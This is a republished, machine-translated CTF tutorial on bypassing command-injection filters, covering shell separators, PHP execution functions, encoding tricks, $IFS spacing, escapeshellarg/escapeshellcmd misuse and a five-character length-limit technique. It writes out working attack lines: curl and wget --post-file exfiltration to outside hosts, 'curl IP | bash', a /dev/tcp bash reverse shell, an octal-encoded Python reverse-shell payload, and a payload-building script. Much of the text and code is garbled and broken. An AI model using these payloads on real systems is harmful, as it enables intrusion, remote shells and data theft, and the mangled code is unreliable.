Shulou(Shulou.com)05/31 Report--

Editor to share with you how to achieve CTF command execution bypass method, I believe that most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

For reference, study and use only

Command execution bypass

Brief introduction

Execute the required commands through the dangerous function of php

Simple examples

After ping ip, any command can be executed by using the command separator of linux.

Command execution can also be carried out through variable variables of php

It is similar to: ${cmd} or $$a cmd}.

Most of the linux commands are placed in the / bin or / sbin directory. If you cannot execute them, you can consider using commands such as / bin/cat.

Common delimiter

Separate each command with a; sign, and each command is executed sequentially from left to right, regardless of whether it fails or not. All commands are

It will be executed.

&

Background execution

& &

The & & connection is used between commands to realize the function of logic and.

Only if the command on the left of & & returns true (the command return value $? = = 0), the command on the right of & & will be executed.

As long as a command returns false (the command returns a value of $? = = 1), the subsequent command will not be executed.

| |

Command A | Command B, that is, the correct output of command An is used as the operation object of command B.

For example: ps aux | grep "test" looks for test in the results in ps aux.

| | |

Use "|" to connect between commands to achieve the function of logic or.

Only if the command on the left returns false (the return value of the command $? = = 1), the command on the right will be executed.

0a, 0d

Win:

Functions that can execute commands in php

System ()

Shell_exec ()

Eval ()

Asssert ()

Exec ()

Preg_replace ()

Call_user_func ()

Passthru ()

Pctml_exec ()

Popen ()

Proc_open ()

Execution of the backquote command (backquotation marks are equivalent to shell_exec ())

Rayi\ shinelon Common filter Bypass coding Bypass

If the website injected by the command filters certain delimiters, you can bypass the delimiters after encoding (url encoding, base64, etc.)

Octal bypass

$(printf "\ 154,163") / / ls command

This code can be spliced.

/ / it's filtered here. Only 0-9a-zA-Z ">\\ $() is allowed. Echo$IFS$9 $(printf$IFS$9 "\ 163,163,157157157157155157157157157157157157157157157157157157157157157157157157157167167157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157 \ 54\ 137\ 137\ 151\ 155\ 160\ 157\ 162\ 164\ 137\ 50\ 42\ 163\ 157\ 143\ 153\ 145\ 164\ 51\ 56\ 123\ 117\ 137\ 123\ 122\ 105\ 115\ 51\ 73\ 163\ 143\ 157\ 156\ 156\ 145\ 164\ 50\ 42\ 64\ 67\ 61\ 60\ 56\ 61\ 62\ 60\ 61 \ 63\ 42\ 54\ 62\ 63\ 51\ 51\ 73\ 137\ 151\ 155\ 160\ 157\ 162\ 164\ 137\ 50\ 42\ 157\ 163\ 42\ 51\ 56\ 144\ 165\ 160\ 62\ 50\ 163\ 146\ 151\ 154\ 156\ 157\ 50\ 51\ 51\ 73\ 137\ 151\ 155\ 160\ 157\ 162\ 164\ 137\ 137\ 50\ 42\ 157\ 163 \ 42\ 51\ 56\ 144\ 165\ 160\ 62\ 50\ 163\ 56\ 151\ 154\ 156\ 157\ 50\ 51\ 61\ 73\ 137\ 151\ 155\ 160\ 162\ 164\ 137\ 50\ 42\ 157\ 163\ 51\ 56\ 144\ 165\ 160\ 62\ 50\ 163\ 56\ 146\ 154\ 156\ 157\ 50 51\ 54\ 62\ 51\ 73\ 160\ 75 \ 137\ 137\ 151\ 155\ 160\ 157\ 162\ 167,137\ 50\ 42\ 163\ 165\ 142\ 162\ 157\ 143\ 145\ 163\ 163\ 51\ 56\ 143\ 141\ 154\ 50\ 133\ 42\ 57\ 142\ 151\ 57\ 141\ 163\ 150\ 42) > $(printf$IFS$9 "\ 57") detect$ (printf$IFS$9 "\ 56") pyecho 'python bounce payload' > / detect.py

Example:

From flask import Flaskfrom flask import render_template,requestimport subprocess,reapp = Flask (_ _ name__) @ app.route ('/', methods= ['GET']) def index (): return render_template (' index.html') @ app.route ('/ run',methods= ['POST']) def run (): cmd = request.form.get ("cmd") if re.search (renders' [^ 0-9a-zA-Z ">\\ $() ]', cmd): return 'Hackerbread' If re.search (r'''ping | wget | curl | bash | perl | python | php | kill | ps''',cmd): return 'Hackerbread' P = subprocess.Popen (cmd,stderr=subprocess.STDOUT, stdout=subprocess.PIPE,shell=True,close_fds=True) try: (msg, errs) = p.communicate (timeout=5) return msg except Exception as e: return'Errorfolk app.run (host='0.0.0.0',port='5000')

Overwrite the original scheduled execution, which is used to clear the detect.py of the process and directly get root permissions.

Hexadecimal bypass

Echo "636174202F6574632F706173737764" | xxd-r-p | bash

Space filtering

Linux built-in delimiter

${IFS}, $IFS,$IFS$9

Root # cat$ {IFS} flagweqweqweqweqweqweroot # cat$IFS$9flagweqweqweqweqweqwe >, + filtering

For filtering symbols such as >, +, etc., the $PS2 variable is >, and the $PS4 variable is +

Keyword bypass

Achieve the bypass effect by splitting the command

What's wrong with it?

Null variable bypass

Cat fl$ {x} ag

Cat tes$ (z) t/flag

Control environment variable bypass

$PATH = > "/ usr/local/ … .blablabla"

${PATH:0:1} = >'/'

${PATH:1:1} = >'u'

${PATH:0:4} = >'/ usr'

Null bypass

Cat fl "" ag

Cat fl''ag

Cat "fl"ag"

Backslash bypass

Ca\ t flag

L\ s

Null variable

$* and $@, $x (x represents 1-9), ${x} (x > = 10): for example, ca$ {21} t a.txt means that cat a.txt defaults to null without passing parameters, as follows:

Wh$1oami

Who$@ami

Whoa$*mi

The use of curly braces

You can also use {OS_COMMAND,ARGUMENT} to execute system commands in Linux bash

{cat,flag}

Command execution without echo

You can output the result of the command to the accessed url through the curl command

Curl www.rayi.vip/ `whoami`

Can be seen in the server log

Xx.xx.xx.xx-[12/Aug/2019:10:32:10 + 0800] "GET / root HTTP/1.1" 404 146 "-" curl/7.58.0 "

In this way, the echo of the command can be seen in the log.

File read command ls | bash | tac | nl | more | less | head | wget | tail | vi | cat | od | grep | sed | bzmore | bzless | pcre | paste | diff | file | echo | sort | cut | xxd

Wget takes out without echo

Wget-- post-file flag 47.100.120.123:2333escapeshellarg () escapeshellcmd () bypass

Escapeshellarg ()

Escapeshellarg (string$arg): string

Escapeshellarg () adds a single quote to the string and can reference or transcode any existing single quotation marks to ensure that a string can be passed directly into the shell function and that it is safe. This function should be used for some of the parameters entered by the user.

Examples

Escapeshellcmd ()

Escapeshellcmd (string$command): string

Escapeshellcmd () escapes characters in the string that may trick the shell command into executing arbitrary commands. This function ensures that the data entered by the user is escaped before it is passed to the exec () or system () function, or before the operator is executed.

The backslash (\) is inserted before the following characters: * & #; `| *? ~ ^ () [] {} $*,\ x0A and\ xFF. 'and' are escaped only when they are not matched. On Windows platforms, all of these characters, as well as the% and! characters, are replaced by spaces.

Escape for single quotation marks

Loopholes caused by simultaneous use

The original intention of using escapeshellarg () is to avoid parameter injection, but if you use escapeshellcmd () on this basis, it will cause parameter injection.

Example:

At this time, we can only scan one ip address and cannot add parameters.

-oN/-oX/-oG:

Write the report to a file in the format of normal (custom .txt) and XML,grepable.

But if you have an extra escapeshellcmd,

You can write a sentence.

Be careful to put single quotation marks twice, otherwise there will be strange errors in the file name or somewhere else.

Length bypass

Reference topic from: https://www.jianshu.com/p/a77e956d9941

P God course: https://www.leavesongs.com/SHARE/some-tricks-from-my-secret-group.html

Title: hitcon2017's babyfirst,hgame2020 problem maker Service Center

Suppose we can only execute commands of length 5 at a time.

Principle

You can use a backslash to wrap the line when the linux command is executed

The above rules also apply in bash scripts

You can use the file name plus a backslash to form the command, use ls-t > o to output the file name to the file, and use bash o to execute the script

Ls output

By default, ls is sorted by ascii code from smallest to largest.

If you want to control the sorting of files, we can use ls-t

Ls-t is sorted by the time the file was created

Export ls-t to a file

In this way, we can first separate the command we are going to execute with a backslash, write the command-delimited file name to a file using ls-t, and then execute the script using bash

Backslash

Combined use

Construct ls-t

Command: > ls\\ # generate a file named ls command: ls > _ # in order to make sure that ls comes first in ls-t, use ls > _ to input ls into file _ command: >\ # generate spaces between ls-t A file command named\: >-t\\ # generate a file named-t\ > g # generate a file named > g command: ls > > _ # write all file names to file _ command: sh _ # execute the ls-t command concatenated by\ from top to bottom And input the result into file g

With ls-t as a springboard, we can write other commands

For convenience, we can use curl to download scripts from our vps and bounce shell. So we just need to construct

Curl 47.100.120.123Unigram | bash

On vps

Bash-I > & / dev/tcp/47.100.120.123/2333 0 > & 1

For more convenience, we can digitize the ip of vps

Http://www.msxindl.com/tools/ip/ip_num.asp

795113595

So the payload to be constructed becomes

Curl 795113595amp g | bash

The pagoda I used for vps, I didn't figure out how to support pure digital ip.

Import requestsfrom time import sleepimport urllibpayload = [# generate `ls-t > g` file'> ls\\','ls > _','>\','>-t\\','>\ > grub,'ls > > _', # generate `bash` # Note that the file name cannot be. Note that the file name cannot be duplicated # Note that vps can only use index, because the file name cannot start with /. Tragically, my vps ip happens to have two zeros. Domain names can only be used:'> sh\','> ba\\','>\ |\ |\\','> p\','> vi\\','> I.\\','> y\\','> ra\\','> w.\','> ww\\','>\','> rl\\','> cu\\' # exec'sh _', # execute ls-t > g'sh g'] r = requests.get ('http://url/?reset=1')for i in payload: assert len (I))

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.